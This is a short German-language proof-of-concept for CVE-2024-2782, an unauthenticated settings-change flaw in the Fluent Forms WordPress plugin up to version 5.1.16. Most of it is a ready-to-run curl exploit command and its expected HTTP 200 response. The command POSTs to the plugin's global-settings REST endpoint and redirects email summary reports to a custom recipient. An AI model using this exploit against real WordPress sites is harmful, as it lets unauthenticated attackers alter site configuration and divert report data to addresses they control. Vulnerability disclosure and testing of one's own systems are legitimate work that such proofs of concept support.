
CVE-2024-2782 Proof-of-Concept
CVE-2024-2782 Proof-of-Concept (Nachweis des Konzepts)
Das Contact-Form-Plugin von Fluent Forms für das Quiz-, Umfrage- und Drag-&-Drop-WP-Formular-Builder-Plugin für WordPress ist anfällig für unbefugte Änderungen von Daten aufgrund einer fehlenden Berechtigungsprüfung am REST-API-Endpunkt /wp-json/fluentform/v1/global-settings in allen Versionen bis einschließlich 5.1.16. Dies ermöglicht es nicht authentifizierten Angreifern, alle Einstellungen des Plugins zu ändern.
Voraussetzungen
Exploit-Befehl
curl -i -X POST "http://TARGET/wp-json/fluentform/v1/global-settings"
-H "Content-Type: application/json"
-d '{
"key": "emailSummarySettings",
"email_report": "{"send_to_type":"custom","custom_recipients":"[email protected]"}"
}'
Erwartete Antwort
HTTP/1.1 200 OK
Date: Thu, 31 Jul 2025 13:11:49 GMT
Server: Apache/2.4.62 (Debian)
X-Powered-By: PHP/8.3.11
X-Robots-Tag: noindex
Link: <http://target:9090/wp-json/>; rel="https://api.w.org/"
X-Content-Type-Options: nosniff
Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link
Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private
Allow: POST
Content-Length: 4
Content-Type: application/json; charset=UTF-8
true
Screenshot

Änderungen in der WordPress-Datenbank überprüfen
